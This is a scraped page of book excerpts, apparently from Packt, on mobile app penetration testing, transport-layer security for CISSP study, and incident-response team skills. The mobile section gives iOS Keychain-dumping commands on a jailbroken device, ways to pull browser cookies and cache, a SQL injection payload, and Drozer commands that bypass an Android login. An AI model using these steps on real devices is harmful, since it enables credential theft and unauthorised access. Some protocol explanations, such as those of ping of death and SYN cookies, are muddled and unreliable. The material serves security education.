ones that are currently operational with a green color. Since we want to bypass the current login screen, and load directly into the main page, we look for UIViewController. Inside UIViewController, we see SM_LoginManagerController, which could contain methods relevant to authentication. On observing the class, we see various methods such as numberLoginSucceed, patternLoginSucceed, and many others. The app calls the unlockWasSuccessful method when a PIN code is entered successfully. So, when we invoke this method from our machine and the function is called directly, the app loads the main page successfully. There's more... The current recipe used just onedynamic analyzer but other options and tools can also be employed. There are many challenges in doingdynamic analysis of iOS applications. You may like to use multiple tools and not just rely on one to overcome the challenges. See also https://code.google.com/p/snoop-it/ Auditing Android apps using a dynamic analyzer Examining iOS App Data storage and Keychain security vulnerabilities Keychain iniOS is an encrypted SQLite database that uses a 128-bit AES algorithm to hold identities and passwords. On any iOS device, theKeychain SQLite database is used to store user credentials such as usernames, passwords, encryption keys, certificates, and so on. Developers use this service API to instruct the operating system to store sensitive data securely, rather than using a less secure alternative storage mechanism such as a property list file or a configuration file. In this recipe we will be analyzing Keychain dump to discover stored credentials. Getting ready Please follow the given steps to prepare for Keychain dump analysis: Jailbreak the iPhone or iPad. Ensure the SSH server is running on the device (default after jailbreak). Download the Keychain_dumper binary from https://github.com/ptoomey3/Keychain-Dumper Connect the iPhone and the computer to the same Wi-Fi network. On the computer, run SSH into the iPhone by typing the iPhone IP address, username as root, and password as alpine. How to do it... Follow these steps toexamine security vulnerabilities in iOS: Copy keychain_dumper into the iPhone or iPad by issuing the following command: scp root@<device ip>:keychain_dumper private/var/tmp Alternatively, Windows WinSCP can be used to do the same: Once the binary has been copied, ensure the keychain-2.db has read access: chmod +r /private/var/Keychains/keychain-2.db This is shown in the following screenshot: Give executable right to binary: chmod 777 /private/var/tmp/keychain_dumper Now, we simply run keychain_dumper: /private/var/tmp/keychain_dumper This command will dump all keychain information, which will contain all the generic and Internet passwords stored in the keychain: How it works... Keychain in an iOS device is used to securely store sensitive information such as credentials, such as usernames, passwords, authentication tokens for different applications, and so on, along with connectivity (Wi-Fi/VPN) credentials and so on. It is located on iOS devices as an encrypted SQLite database file located at /private/var/Keychains/keychain-2.db. Insecurity arises when application developers use this feature of the operating system to store credentials rather than storing it themselves in NSUserDefaults, .plist files, and so on. To provide users the ease of not having to log in every time and hence saving the credentials in the device itself, the keychain information for every app is stored outside of its sandbox. There's more... This analysis can also be performed for specific apps dynamically, using tools such as Snoop-it. Follow the steps to hook Snoop-it to the target app, click on Keychain Values, and analyze the attributes to see its values reveal in the Keychain. More will be discussed in further recipes. Finding vulnerabilities in WAP-based mobile apps WAP-based mobile applications are mobile applications or websites that run on mobile browsers. Most organizations create a lightweight version of their complex websites to be able to run easily and appropriately in mobile browsers. For example, a hypothetical company called ABCXYZ may have their main website at www.abcxyz.com, while their mobile website takes the form m.abcxyz.com. Note that the mobile website (or WAP apps) are separate from their installable application form, such as .apk on Android. Since mobile websites run on browsers, it is very logical to say that most of the vulnerabilities applicable to web applications are applicable to WAP apps as well. However, there are caveats to this. Exploitability and risk ratings may not be the same. Moreover, not all attacks may be directly applied or conducted. Getting ready For this recipe, make sure to be ready with the following set of tools (in the case of Android): ADB WinSCP Putty Rooted Android mobile SSH proxy application installed on Android phone Let us see the common WAP application vulnerabilities. While discussing these, we will limit ourselves to mobilebrowsers only: Browser cache: Android browsers store cache in two different parts—content cache and component cache. Content cache may contain basic frontend components such as HTML, CSS, or JavaScript. Component cache contains sensitive data like the details to be populated once content cache is loaded. You have to locate the browser cache folder and find sensitive data in it. Browser memory: Browser memory refers to the location used by browsers to store the data. Memory is usually long-term storage, while cache is short-term. Browse through the browser memory space for various files such as .db, .xml, .txt, and so on. Check all these files for the presence of sensitive data. Browser history: Browser history contains the list of the URLs browsed by the user. These URLs in GET request format contain parameters. Again, our goal is to locate a URL with sensitive data for our WAP application. Cookies: Cookies are mechanisms for websites to keep track of user sessions. Cookies are stored locally in devices. Following are the security concerns with respect to cookie usage: Sometimes a cookie contains sensitive information Cookie attributes, if weak, may make the application security weak Cookie stealing may lead to a session hijack How to do it... Browser Cache: Let's look at the steps that need to be followed with browser cache: Android browser cache can be found at this location: /data/data/com.android.browser/cache/webviewcache/. You can use either ADB to pull the data from webviewcache, or use WinSCP/Putty and connect to SSH application in rooted Android phones. Either way, you will land up at the webviewcache folder and find arbitrarily named files. Refer to the highlighted section in the following screenshot: Rename the extension of arbitrarily named files to .jpg and you will be able to view the cache in screenshot format. Search through all files for sensitive data pertaining to the WAP app you are searching for. Browser Memory: Like an Android application, browser also has a memory space under the /data/data folder by the name com.android.browser (default browser). Here is how a typical browser memory space looks: Make sure you traverse through all the folders to get the useful sensitive data in the context of the WAP application you are looking for. Browser history Go to browser, locate options, navigate to History, and find the URLs present there. Cookies The files containing cookie values can be found at /data/data/com.android.browser/databases/webview.db. These DB files can be opened with the SQLite Browser tool and cookies can be obtained. There's more... Apart from the primary vulnerabilities described here mainly concerned with browser usage, all otherweb application vulnerabilities which are related to or exploited from or within a browser are applicable and need to be tested: Cross-site scripting, a result of a browser executing unsanitized harmful scripts reflected by the servers is very valid for WAP applications. The autocomplete attribute not turned to off may result in sensitive data remembered by the browser for returning users. This again is a source of data leakage. Browser thumbnails and image buffer are other sources to look for data. Above all, all the vulnerabilities in web applications, which may not relate to browser usage, apply. These include OWASP Top 10 vulnerabilities such as SQL injection attacks, broken authentication and session management, and so on. Business logic validation is another important check to bypass. All these are possible by setting a proxy to the browser and playing around with the mobile traffic. The discussion of this recipe has been around Android, but all the discussion is fully applicable to an iOS platform when testing WAP applications. Approach, steps to test, and the locations would vary, but all vulnerabilities still apply. You may want to try out iExplorer and plist editor tools when working with an iPhone or iPad. See also http://resources.infosecinstitute.com/browser-based-vulnerabilities-in-web-applications/ Finding client-side injection Client-side injection is a new dimension to the mobile threat landscape. Client side injection (also known as local injection) is a result of the injection of malicious payloads to local storage to reveal data not by the usual workflow of the mobile application. If 'or'1'='1 is injected in a mobile application on search parameter, where the search functionality is built to search in the local SQLite DB file, this results in revealing all data stored in the corresponding table of SQLite DB; client side SQL injection is successful. Notice that the payload did not to go the database on the server side (which possibly can be Oracle or MSSQL) but it did go to the local database (SQLite) in the mobile. Since the injection point and injectable target are local (that is, mobile), the attack is called a client side injection. Getting ready To get ready to find client side injection, have a few mobile applications ready to be audited and have a bunch of tools used in many other recipes throughout this book. Note that client side injection is not easy to find on account of the complexities involved; many a time you will have to fine-tune your approach as per the successful first signs. How to do it... The prerequisite to the existence of client side injection vulnerability in mobile apps is the presence of a local storage and an application feature which queries the local storage. For the convenience of the first discussion, let us learn client side SQL injection, which is fairly easy to learn as users know very well SQL Injection in web apps. Let us take the case of a mobile banking application which stores the branch details in a local SQLite database. The application provides a search feature to users wishing to search a branch. Now, if a person types in the city as Mumbai, the city parameter is populated with the value Mumbai and the same is dynamically added to the SQLite query. The query builds and retrieves the branch list for Mumbai city. (Usually, purely local features are provided for faster user experience and network bandwidth conservation.) Now if a user is able to inject harmful payloads into the city parameter, such as a wildcard character or a SQLite payload to the drop table, and the payloads execute revealing all the details (in the case of a wildcard) or the payload drops the table from the DB (in the case of a drop table payload) then you have successfully exploited client side SQL injection. Another type of client side injection, presented in OWASP Mobile TOP 10 release, is local cross-site scripting (XSS). Refer to slide number 22 of the original OWASP PowerPoint presentation here: http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks. They referred to it as Garden Variety XSS and presented a code snippet, wherein SMS text was accepted locally and printed at UI. If a script was inputted in SMS text, it would result in local XSS (JavaScript Injection). There's more... In a similar fashion, HTML Injection is also possible. If an HTML file contained in the application local storage can be compromised to contain malicious code and the application has a feature which loads or executes this HTML file, HTML injection is possible locally. A variant of the same may result in Local File Inclusion (LFI) attacks. If data is stored in the form of XML files in the mobile, local XML Injection can also be attempted. There could be morevariants of these attacks possible. Finding client-side injection is quite difficult and time consuming. It may need to employ both static and dynamic analysis approaches. Most scanners also do not support discovery of Client Side Injection. Another dimension to Client Side Injection is the impact, which is judged to be low in most cases. There is a strong counter argument to this vulnerability. If the entire local storage can be obtained easily in Android, then why do we need to conduct Client Side Injection? I agree to this argument in most cases, as the entire SQLite or XML file from the phone can be stolen, why spend time searching a variable that accepts a wildcard to reveal the data from the SQLite or XML file? However, you should still look out for this vulnerability, as HTML injection or LFI kind of attacks have malware-corrupted file insertion possibility and hence the impactful attack. Also, there are platforms such as iOS where sometimes, stealing the local storage is very difficult. In such cases, client side injection may come in handy. See also https://www.owasp.org/index.php/Mobile_Top_10_2014-M7 http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks Insecure encryption in mobile apps Encryption is one of the misused terms in information security. Some people confuse it with hashing, while others may implement encoding and call itencryption. symmetric key and asymmetric key are two types of encryption schemes. Mobile applications implement encryption to protect sensitive data in storage and in transit. While doing audits, your goal should be to uncover weak encryption implementation or the so-called encoding or other weaker forms, which are implemented in places where a proper encryption should have been implemented. Try to circumvent the encryption implemented in the mobile application under audit. Getting ready Be ready with a fewmobile applications and tools such as ADB and other file and memory readers, decompiler and decoding tools, and so on. How to do it... There are multiple types of faulty implementation ofencryption in mobile applications. There are different ways to discover each of them: Encoding (instead of encryption): Many a time, mobile app developers simply implement Base64 or URL encoding in applications (an example of security by obscurity). Such encoding can be discovered by simply doing static analysis. You can use the script discussed in the first recipe of this article for finding out such encoding algorithms. Dynamic analysis will help you obtain the locally stored data in encoded format. Decoders for these known encoding algorithms are available freely. Using any of those, you will be able to uncover the original value. Thus, such implementation is not a substitute for encryption. Serialization (instead of encryption): Another variation of faulty implementation is serialization. Serialization is the process of conversion of data objects to byte stream. The reverse process, deserialization, is also very simple and the original data can be obtained easily. Static Analysis may help reveal implementations using serialization. Obfuscation (instead of encryption): Obfuscation also suffers from similar problems and the obfuscated values can be deobfuscated. Hashing (instead of encryption): Hashing is a one-way process using a standard complex algorithm. These one-way hashes suffer from a major problem in that they can be replayed (without needing to recover the original data). Also, rainbow tables can be used to crack the hashes. Like other techniques described previously, hashing usage in mobile applications can also be discovered via static analysis. Dynamic analysis may additionally be employed to reveal the one-way hashes stored locally. How it works... To understand the insecure encryption in mobile applications, let us take a live case, which we observed. An example of weak custom implementation While testing a live mobile banking application, me and my colleagues came across a scenario where a userid and mpin combination was sent by a custom encoding logic. The encoding logic here was based on a predefined character by character replacement by another character, as per an in-built mapping. For example: 2 is replaced by 4 0 is replaced by 3 3 is replaced by 2 7 is replaced by = a is replaced by R A is replaced by N As you can notice, there is no logic to the replacement. Until you uncover or decipher the whole in-built mapping, you won't succeed. A simple technique is to supply all possible characters one-by-one and watch out for the response. Let's input userid and PIN as 222222 and 2222 and notice the converted userid and PIN are 444444 and 4444 respectively, as per the mapping above. Go ahead and keep changing the inputs, you will create a full mapping as is used in the application. Now steal the user's encoded data and apply the created mapping, thereby uncovering the original data. This whole approach is nicely described in the article mentioned under the See also section of this recipe. This is a custom example of faulty implementation pertaining to encryption. Such kinds of faults are often difficult to find in static analysis, especially in the case of difficult to reverse apps such as iOS applications. The possibility of automateddynamic analysis discovering this is also difficult. Manual testing and analysis stands, along with dynamic or automated analysis, a better chance of uncovering such customimplementations. There's more... Finally, I would share another application we came across. This one used proper encryption. The encryption algorithm was a well known secure algorithm and the key was strong. Still, the whole encryption process can be reversed. The application had two mistakes; we combined both of them to break the encryption: The application code had the standard encryption algorithm in the APK bundle. Not even obfuscation was used to protect the names at least. We used the simple process of APK to DEX to JAR conversion to uncover the algorithm details. The application had stored the strong encryption key in the local XML file under the /data/data folder of the Android device. We used adb to read this xml file and hence obtained the encryption key. According to Kerckhoff's principle, the security of a cryptosystem should depend solely on the secrecy of the key and the private randomizer. This is how all encryption algorithms are implemented. The key is the secret, not the algorithm. In our scenario, we could obtain the key and know the name of the encryption algorithm. This is enough to break the strong encryption implementation. See also http://www.paladion.net/index.php/mobile-phone-data-encryption-why-is-it-necessary/ Discovering data leakage sources Data leakage risk worries organizations across the globe and people have been implementing solutions to prevent data leakage. In the case of mobile applications, first we have to think what could be the sources or channels for data leakage possibility. Once this is clear, devise or adopt a technique to uncover each of them. Getting ready As in other recipes, here also you need bunch of applications (to be analyzed), an Android device or emulator, ADB, DEX to JAR converter, Java decompilers, Winrar, or Winzip. How to do it... To identify the data leakage sources, list down all possible sources you can think of for the mobile application under audit. In general, all mobile applications have the following channels of potential data leakage: Files stored locally Client side source code Mobile device logs Web caches Console messages Keystrokes Sensitive data sent over HTTP How it works... The next step is to uncover the data leakage vulnerability at these potential channels. Let us see the six previously identified common channels: Files stored locally: By this time, readers are very familiar with this. The data is stored locally in files like shared preferences, xml files, SQLite DB, and other files. In Android, these are located inside the application folder under /data/data directory and can be read using tools such as ADB. In iOS, tools such as iExplorer or SSH can be used to read the application folder. Client side source code: Mobile application source code is present locally in the mobile device itself. The source code in applications has been hardcoding data, and a common mistake is hardcoding sensitive data (either knowingly or unknowingly). From the field, we came across an application which had hardcoded the connection key to the connected PoS terminal. Hardcoded formulas to calculate a certain figure, which should have ideally been present in the server-side code, was found in the mobile app. Database instance names and credentials are also a possibility where the mobile app directly connects to a server datastore. In Android, the source code is quite easy to decompile via a two-step process—APK to DEX and DEX to JAR conversion. In iOS, the source code of header files can be decompiled up to a certain level using tools such as classdump-z or otool. Once the raw source code is available, a static string search can be employed to discover sensitive data in the code. Mobile device logs: All devices create local logs to store crash and other information, which can be used to debug or analyze a security violation. A poor coding may put sensitive data in local logs and hence data can be leaked from here as well. Android ADB command adb logcat can be used to read the logs on Android devices. If you use the same ADB command for the Vulnerable Bank application, you will notice the user credentials in the logs as shown in the following screenshot: Web caches: Web caches may also contain the sensitive data related to web components used in mobile apps. We discussed how to discover this in the WAP recipe in this article previously. Console messages: Console messages are used by developers to print messages to the console while application development and debugging is in progress. Console messages, if not turned off while launching the application (GO LIVE), may be another source of data leakage. Console messages can be checked by running the application in debug mode. Keystrokes: Certain mobile platforms have been known to cache key strokes. A malware or key stroke logger may take advantage and steal a user's key strokes, hence making it another data leakage source. Malware analysis needs to be performed to uncover embedded or pre-shipped malware or keystroke loggers with the application. Dynamic analysis also helps. Sensitive data sent over HTTP: Applications either send sensitive data over HTTP or use a weak implementation of SSL. In either case, sensitive data leakage is possible. Usage of HTTP can be found via static analysis to search for HTTP strings. Dynamic analysis to capture the packets at runtime also reveals whether traffic is over HTTP or HTTPS. There are various SSL-related weak implementation and downgrade attacks, which make data vulnerable to sniffing and hence data leakage. There's more... Data leakage sources can be vast and listing all of them does not seem possible. Sometimes there are applications or platform-specific data leakage sources, which may call for a different kind of analysis. Intent injection can be used to fire intents to access privileged contents. Such intents may steal protected data such as the personal information of all the patients in a hospital (under HIPPA compliance). iOS screenshot backgrounding issues, where iOS applications store screenshots with populated user input data, on the iPhone or iPAD when the application enters background. Imagine such screenshots containing a user's credit card details, CCV, expiry date, and so on, are found in an application under PCI-DSS compliance. Malwares give a totally different angle to data leakage. Note that data leakage is a very big risk organizations are tackling today. It is not just financial loss; losses may be intangible, such as reputation damage, or compliance or regulatory violations. Hence, it makes it very important to identify the maximum possible data leakage sources in the application and rectify the potential leakages. See also https://www.owasp.org/index.php/Mobile_Top_10_2014-M4 Launching intent injection in Android Other application-based attacks in mobile devices When we talk about application-based attacks, OWASP TOP 10 risks are the very first things that strike. OWASP (www.owasp.org) has a dedicated project to mobile security, which releases Mobile Top 10. OWASP gathers data from industry experts and ranks the top 10 risks every three years. It is a very good knowledge base for mobile application security. Here is the latest Mobile Top 10 released in the year 2014: M1: Weak Server Side Controls M2: Insecure Data Storage M3: Insufficient Transport Layer Protection M4: Unintended Data Leakage M5: Poor Authorization and Authentication M6: Broken Cryptography M7: Client Side Injection M8: Security Decisions via Untrusted Inputs M9: Improper Session Handling M10: Lack of Binary Protections Getting ready Have a few applications ready to be analyzed, use the same set of tools we have been discussing till now. How to do it... In this recipe, we restrict ourselves to other application attacks. The attacks which we have not covered till now in this book are: M1: Weak Server Side Controls M5: Poor Authorization and Authentication M8: Security Decisions via Untrusted Inputs M9: Improper Session Handling How it works... Currently, let us discuss client-side or mobile-side issues for M5, M8, and M9. M5: Poor Authorization and Authentication A few common scenarios which can be attacked are: Authentication implemented at device level (for example, PIN stored locally) Authentication bound on poor parameters (such as UDID or IMEI numbers) Authorization parameter responsible for access to protected application menus is stored locally These can be attacked by reading data using ADB, decompiling the applications, and conducting static analysis on the same or by doing dynamic analysis on the outgoing traffic. M8: Security Decisions via Untrusted Inputs This one talks about IPC. IPC entry points forapplications to communicate to one other, such as Intents in Android or URL schemes in iOS, are vulnerable. If the origination source is not validated, the application can be attacked. Malicious intents can be fired to bypass authorization or steal data. Let us discuss this in further detail in the next recipe. URL schemes are a way for applications to specify the launch of certain components. For example, the mailto scheme in iOS is used to create a new e-mail. If theapplications fail to specify the acceptable sources, any malicious application will be able to send a mailto scheme to the victim application and create new e-mails. M9: Improper Session Handling From a purely mobile device perspective, session tokens stored in .db files or oauth tokens, or strings granting access stored in weakly protected files, are vulnerable. These can be obtained by reading the local data folder using ADB. See also https://www.owasp.org/index.php/P;rojects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks Launching intent injection in Android Android uses intents to request action from another application component. A common communication is passing Intent to start a service. We will exploit this fact via an intent injection attack. An intent injection attack works by injecting intent into the application component to perform a task that is usually not allowed by the application workflow. For example, if the Android application has a login activity which, post successful authentication, allows you access to protected data via another activity. Now if an attacker can invoke the internal activity to access protected data by passing an Intent, it would be an Intent Injection attack. Getting ready Install Drozer by downloading it from https://www.mwrinfosecurity.com/products/drozer/ and following the installation instructions mentioned in the User Guide. Install Drozer Console Agent and start a session as mentioned in the User Guide. If your installation is correct, you should get a Drozer command prompt (dz>).   How to do it... You should also have a few vulnerable applications to analyze. Here we chose the OWASP GoatDroid application: Start the OWASP GoatDroid Fourgoats application in emulator. Browse the application to develop understanding. Note that you are required to authenticate by providing a username and password, and post-authentication you can access profile and other pages. Here is the pre-login screen you get: Let us now use Drozer to analyze the activities of the Fourgoats application. The following Drozer command is helpful: run app.activity.info -a <package name> Drozer detects four activities with null permission. Out of these four, ViewCheckin and ViewProfile are post-login activities. Use Drozer to access these two activities directly, via the following command: run app.activity.start --component <package name> <activity name> We chose to access ViewProfile activity and the entire sequence of activities is shown in the following screenshot: Drozer performs some actions and the protected user profile opens up in the emulator, as shown here: How it works... Drozer passed an Intent in the background to invoke the post-login activity ViewProfile. This resulted in ViewProfile activity performing an action resulting in display of profile screen. This way, an intent injection attack can be performed using Drozer framework. There's more... Android usesintents also forstarting a service or delivering a broadcast. Intent injection attacks can be performed on services and broadcast receivers. A Drozer framework can also be used to launch attacks on the app components. Attackers may write their own attack scripts or use different frameworks to launch this attack. See also Using Drozer to find vulnerabilities in Android applications https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf Resources for Article: Further resources on this subject: Mobile Devices[article] Development of Windows Mobile Applications (Part 1)[article] Development of Windows Mobile Applications (Part 2)[article]
Read more
  • 0
  • 0
  • 10869

article-image-communication-and-network-security
Packt
21 Jun 2016
7 min read
Save for later

Communication and Network Security

Packt
21 Jun 2016
7 min read
In this article by M. L. Srinivasan, the author of the book CISSP in 21 Days, Second Edition, the communication and network security domain deals with the security of voice and data communications through Local area, Wide area, and Remote access networking. Candidates are expected to have knowledge in the areas of secure communications; securing networks; threats, vulnerabilities, attacks, and countermeasures to communication networks; and protocols that are used in remote access. (For more resources related to this topic, see here.) Observe the following diagram. This represents seven layers of the OSI model. This article covers protocols and security in the fourth layer, which is the Transport layer: Transport layer protocols and security The Transport layer does two things. One is to pack the data given out by applications to a format that is suitable for transport over the network, and the other is to unpackthe data received from the network to a format suitable for applications. In this layer, some of the important protocols are Transmission Control Protocol (TCP), User Datagram Protocol (UDP), Stream Control Transmission Protocol (SCTP), Datagram Congestion Control Protocol (DCCP), and Fiber Channel Protocol (FCP). The process of packaging the data packets received from the applications is called encapsulation, and the output of such a process is called a datagram. Similarly, the process of unpacking the datagram received from the network is called decapstulation. When moving from the seventh layer down to the fourth one, when the fourth layer's header is placed on data, it comes as a datagram. When the datagram is encapsulated with the third layer's header, it becomes a packet, the encapsulated packet becomes a frame, and puts on the wire as bits. The following section describes some of the important protocols in this layer along with security concerns and countermeasures. Transmission Control Protocol (TCP) It is a core Internet protocol that provides reliable delivery mechanisms over the Internet. TCP is a connection-oriented protocol. A protocol that guarantees the delivery of datagram (packets) to the destination application by way of a suitable mechanism (for example, a three-way handshake SYN, SYN-ACK, and ACK in TCP) is called a connection-oriented protocol. The reliability of the datagram delivery of such protocol is high due to the acknowledgment part by the receiver. This protocol has two primary functions. The primary function of TCP is the transmission of datagram between applications, and the secondary one is in terms of controls that are necessary for ensuring reliable transmissions. Applications where the delivery needs to be assured such as e-mail, the World Wide Web (WWW), file transfer,and so on use TCP for transmission. Threats, vulnerabilities, attacks, and countermeasures One of the common threats to TCP is a service disruption. A common vulnerability is half-open connections exhausting the server resources. The Denial of Service attacks such as TCP SYN attacks as well as connection hijacking such as IP Spoofing attacks are possible. A half-open connection is a vulnerability in the TCP implementation.TCP uses a three-way handshake to establish or terminate connections. Refer to the following diagram: In a three-way handshake, the client first (workstation) sends a request to the server (for example www.SomeWebsite.com). This is called a SYN request. The server acknowledges the request by sending a SYN-ACK, and in the process, it creates a buffer for this connection. The client does a final acknowledgement by ACK. TCP requires this setup, since the protocol needs to ensure the reliability of the packet delivery. If the client does not send the final ACK, then the connection is called half open. Since the server has created a buffer for that connection,a certain amount of memory or server resource is consumed. If thousands of such half-open connections are created maliciously, then the server resources maybe completely consumed resulting in the Denial-of-Service to legitimate requests. TCP SYN attacks are technically establishing thousands of half-open connections to consume the server resources. There are two actions that an attacker might do. One is that the attacker or malicious software will send thousands of SYN to the server and withheld ACK. This is called SYN flooding. Depending on the capacity of the network bandwidth and the server resources, in a span of time,all the resources will be consumed resulting in the Denial-of-Service. If the source IP was blocked by some means, then the attacker or the malicious software would try to spoof the source IP addresses to continue the attack. This is called SYN spoofing. SYN attacks such as SYN flooding and SYN spoofing can be controlled using SYN cookies with cryptographic hash functions. In this method, the server does not create the connection at the SYN-ACK stage. The server creates a cookie with the computed hash of the source IP address, source port, destination IP, destination port, and some random values based on the algorithm and sends it as SYN-ACK. When the server receives an ACK, it checks the details and creates the connection. A cookie is a piece of information usually in the form of text file sent by the server to a client. Cookies are generally stored in browser disk or client computers, and they are used for purposes such as authentication, session tracking, and management. User Datagram Protocol (UDP) UDP is a connectionless protocol and is similar to TCP. However, UDP does not provide the delivery guarantee of data packets. A protocol that does not guarantee the delivery of datagram (packets) to the destination is called connectionless protocol. In other words, the final acknowledgment is not mandatory in UDP. UDP uses one-way communication. The speed delivery of the datagram by UDP is high. UDP is predominantly used where a loss of intermittent packets is acceptable such as video or audio streaming. Threats, vulnerabilities, attacks, and countermeasures Service disruptions are common threats, and validation weaknesses facilitate such threats. UDP flood attacks cause service disruptions, and controlling UDP packet size acts as a countermeasure to such attacks. Internet Control Message Protocol (ICMP) ICMP is used to discover service availability in network devices, servers ,and so on. ICMP expects response messages from devices or systems to confirm the service availability. Threats, vulnerabilities, attacks, and countermeasures Service disruptions are common threats. Validation weaknesses facilitate such threats. ICMP flood attacks, such as the ping of death, causes service disruptions; and controlling ICMP packet size acts as a countermeasure to such attacks. Pinging is a process of sending the Internet Control Message Protocol (ICMP) ECHO_REQUEST message to servers or hosts to check whether they are up and running. In this process,the server or host on the network responds to a ping request, and such a response is called echo. A ping of death refers to sending large numbers of ICMP packets to the server to crash the system. Other protocols in transport layer Stream Control Transmission Protocol (SCTP): This is a connection-oriented protocol similar to TCP, but it provides facilities such as multi-streaming and multi-homing for better performance and redundancy. It is used in UNIX-like operating systems. Datagram Congestion Control Protocol (DCCP): As the name implies, this is a Transport layer protocol that is used for congestion control. Applications her include the Internet telephony and video/audio streaming over the network. Fiber Channel Protocol (FCP): This protocol is used in high-speed networking. One of the prominent applications here is Storage Area Network (SAN). Storage Area Network (SAN) is a network architecture used to attach remote storage devices, such as tape drives anddisk arrays, to the local server. This facilitates using storage devices as if they are local devices. Summary This article covers protocols and security in thetransport layer, which is the fourth layer. Resources for Article: Further resources on this subject: The GNS3 orchestra [article] CISSP: Vulnerability and Penetration Testing for Access Control [article] CISSP: Security Measures for Access Control [article]
Read more
  • 0
  • 0
  • 3530
Banner background image

article-image-incident-response-and-live-analysis
Packt
10 Jun 2016
30 min read
Save for later

Incident Response and Live Analysis

Packt
10 Jun 2016
30 min read
In this article by Ayman Shaaban and Konstantin Sapronov, author of the book Practical Windows Forensics, describe the stages of preparation to respond to an incident are a matter which much attention should be paid to. In some cases, the lack of necessary tools during the incident leads to the inability to perform the necessary actions at the right time. Taking into account that the reaction time of an incident depends on the efficiency of the incident handling process, it becomes clear that in order to prepare the IR team, its technical support should be very careful. The whole set of requirements can be divided into several categories for the IR team: Skills Hardware Software (For more resources related to this topic, see here.) Let's consider the main issues that may arise during the preparation of the incident response team in more detail. If we want to build a computer security incident response team, we need people with a certain set of skills and technical expertise to perform technical tasks and effectively communicate with other external contacts. Now, we will consider the skills of members of the team. The set of skills that members of the team need to have can be divided into two groups: Personal skills Technical skills Personal skills Personal skills are very important for a successful response team. This is because the interaction with team members who are technical experts but have poor social skills can lead to misunderstanding and misinterpretation of the results, the consequences of which may affect the team's reputation. A list of key personal skills will be discussed in the following sections. Written communication For many IR teams, a large part of their communication occurs through written documents. These communications can take many forms, including e-mails concerning incidents documentation of event or incident reports, vulnerabilities, and other technical information notifications. Incident response team members must be able to write clearly and concisely, describe activities accurately, and provide information that is easy for their readers to understand. Oral communication The ability to communicate effectively though spoken communication is also an important skill to ensure that the incident response team members say the right words to the right people. Presentation skills Not all technical experts have good presentation skills. They may not be comfortable in front of a large audience. Gaining confidence in presentation skills will take time and effort for the team's members to become more experienced and comfortable in such situations. Diplomacy The members of the incident response team interact with people who may have a variety of goals and needs. Skilled incident response team members will be able to anticipate potential points of contention, be able to respond appropriately, maintain good relationships, and avoid offending others. They also will understand that they are representing the IR team and their organization. Diplomacy and tact are very important. The ability to follow policies and procedures Another important skill that members of the team need is the ability to follow and support the established policies and procedures of the organization or team. Team skills IR staff must be able to work in the team environment as productive and cordial team players. They need to be aware of their responsibilities, contribute to the goals of the team, and work together to share information, workload, and experiences. They must be flexible and willing to adapt to change. They also need skills to interact with other parties. Integrity The nature of IR work means that team members often deal with information that is sensitive and, occasionally, they might have access to information that is newsworthy. The team's members must be trustworthy, discrete, and able to handle information in confidence according to the guidelines, any constituency agreements or regulations, and/or any organizational policies and procedures. In their efforts to provide technical explanations or responses, the IR staff must be careful to provide appropriate and accurate information while avoiding the dissemination of any confidential information that could detrimentally affect another organization's reputation, result in the loss of the IR team's integrity, or affect other activities that involve other parties. Knowing one's limits Another important ability that the IR team's members must have is the ability to be able to readily admit when they have reached the limit of their own knowledge or expertise in a given area. However difficult it is to admit a limitation, individuals must recognize their limitations and actively seek support from their team members, other experts, or their management. Coping with stress The IR team's members often could be in stressful situations. They need to be able to recognize when they are becoming stressed, be willing to make their fellow team members aware of the situation, and take (or seek help with) the necessary steps to control and maintain their composure. In particular, they need the ability to remain calm in tense situations—ranging from an excessive workload to an aggressive caller to an incident where human life or a critical infrastructure may be at risk. The team's reputation, and the individual's personal reputation, will be enhanced or will suffer depending on how such situations are handled. Problem solving IR team members are confronted with data every day, and sometimes, the volume of information is large. Without good problem-solving skills, staff members could become overwhelmed with the volumes of data that are related to incidents and other tasks that need to be handled. Problem-solving skills also include the ability for the IR team's members to "think outside the box" or look at issues from multiple perspectives to identify relevant information or data. Time management Along with problem-solving skills, it is also important for the IR team's members to be able to manage their time effectively. They will be confronted with a multitude of tasks ranging from analyzing, coordinating, and responding to incidents, to performing duties, such as prioritizing their workload, attending and/or preparing for meetings, completing time sheets, collecting statistics, conducting research, giving briefings and presentations, traveling to conferences, and possibly providing on-site technical support. Technical skills Another important component of the skills needed for an IR team to be effective is the technical skills of their staff. These skills, which define the depth and breadth of understanding of the technologies that are used by the team, and the constituency it serves, are outlined in the following sections. In turn, the technical skills, which the IR team members should have, can be divided into two groups: security fundamentals and incident handling skills. Security fundamentals Let's look at some of the security fundamentals in the following subsections. Security principles The IR team's members need to have a general understanding of the basic security principles, such as the following: Confidentiality Availability Authentication Integrity Access control Privacy Nonrepudiation Security vulnerabilities and weaknesses To understand how any specific attack is manifested in a given software or hardware technology, the IR team's members need to be able to first understand the fundamental causes of vulnerabilities through which most attacks are exploited. They need to be able to recognize and categorize the most common types of vulnerabilities and associated attacks, such as those that might involve the following: Physical security issues Protocol design flaws (for example, man-in-the-middle attacks or spoofing) Malicious code (for example, viruses, worms, or Trojan horses) Implementation flaws (for example, buffer overflow or timing windows/race conditions) Configuration weaknesses User errors or indifference The Internet It is important that the IR team's members also understand the Internet. Without this fundamental background information, they will struggle or fail to understand other technical issues, such as the lack of security in underlying protocols and services that are used on the Internet or to anticipate the threats that might occur in the future. Risks The IR team's members need to have a basic understanding of computer security risk analysis. They should understand the effects on their constituency of various types of risks (such as potentially widespread Internet attacks, national security issues as they relate to their team and constituency, physical threats, financial threats, loss of business, reputation, or customer confidence, and damage or loss of data). Network protocols Members of the IR team need to have a basic understanding of the common (or core) network protocols that are used by the team and the constituency that they serve. For each protocol, they should have a basic understanding of the protocol, its specifications, and how it is used. In addition to this, they should understand the common types of threats or attacks against the protocol, as well as strategies to mitigate or eliminate such attacks. For example, at a minimum, the staff should be familiar with protocols, such as IP, TCP, UDP, ICMP, ARP, and RARP. They should understand how these protocols work, what they are used for, the differences between them, some of the common weaknesses, and so on. In addition to this, the staff should have a similar understanding of protocols, such as TFTP, FTP, HTTP, HTTPS, SNMP, SMTP, and any other protocols. The specialist skills include a more in-depth understanding of security concepts and principles in all the preceding areas in addition to expert knowledge in the mechanisms 